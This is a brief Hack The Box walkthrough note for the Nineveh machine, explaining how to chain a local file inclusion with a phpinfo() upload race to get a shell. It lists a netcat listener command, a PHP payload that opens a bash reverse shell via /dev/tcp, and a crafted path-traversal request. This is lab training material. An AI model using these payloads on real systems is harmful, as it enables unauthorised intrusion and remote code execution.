PHPInfo attacks
- To attack PHPInfo
PHPINFO (with upload function) to upload and LFI to get back result.
It's time for some simple maths:
- We have a LFI (http://nineveh.htb/department/manage.php?notes=)
- We have phpinfo() (http://nineveh.htb/info.php)
LFI + phpinfo() = SHELL :D
- Read this: https://www.insomniasec.com/downloads/publications/LFI With PHPInfo Assistance.pdf
- Backup script: https://github.com/lethanhtung01011980/Notes/tree/master/phpinfo-lfi
- Original script: https://www.insomniasec.com/downloads/publications/phpinfolfi.py
- Use Burp to modify the script to fit the case: https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Nineveh/lfiphpinfo.py
Don't forget to change LHOST, LPORT inside the script and to setup your listener:
- $ nc -lvp 60001
- Usage : python2 ./lfiphpinfo.py 10.10.10.43 80 number_of_threads
- Because we deal with a racing condition, you may have to run this script a couple of times until it succeeds. But I have tested it and it definitely works. :D
Notes:
- Need to fix PHPSESSID after using Burp
- Payload:
PAYLOAD="""Security Test\r<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"""+str(LHOST)+"""/"""+str(LPORT)+""" 0>&1'\");?>\r""" - Need
/..before%s:LFIREQ="""GET /department/manage.php?notes=/ninevehNotes.txt/..%s HTTP/1.1\r